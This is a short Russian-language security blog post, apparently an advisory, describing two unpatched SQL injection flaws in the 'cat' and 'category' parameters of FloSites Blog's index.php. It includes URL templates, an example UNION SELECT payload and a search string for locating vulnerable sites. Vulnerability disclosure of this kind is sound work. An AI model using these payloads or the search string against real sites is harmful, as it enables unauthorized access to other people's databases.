Описание эксплойта:
Внедряемый запрос передается через параметр "cat", либо через параметр "category", сценария "index.php". Параметр используется в составе SQL-запроса без проверки.
Шаблоны:
http://[сайт]/[путь]/index.php?cat=-1 [SQL]/*
http://[сайт]/[путь]/index.php?category=-1 [SQL]/*
Пример [SQL]: +union+select+1,version(),3
Уязвимые приложения идентифицируются в поисковых системах по строке "blog by flosites".
Описание уязвимости:
В веб-приложении FloSites Blog обнаружено две уязвимости к SQL-инъекции в сценарии "index.php". Параметры "cat" и "category" не проверяются на предмет инъекций перед использованием в SQL-запросе, что позволяет выполнить произвольный запрос, обратившись к сценарию при помощи специально сформированного URL.
ЗАЩИТА
По данным на 18 ноября 2008 г., уязвимости не устранены.
Безопасность в интернете, то что должен знать каждый человек у которого есть компьютер! Информация будет полезна для администраторов, занимающихся обеспечением безопасности сетей, для программистов, стремящихся к созданию защищенных приложений, а также для всех тех, кто интересуется вопросами сетевой защиты.
0 коментарии:
Оставить коментарий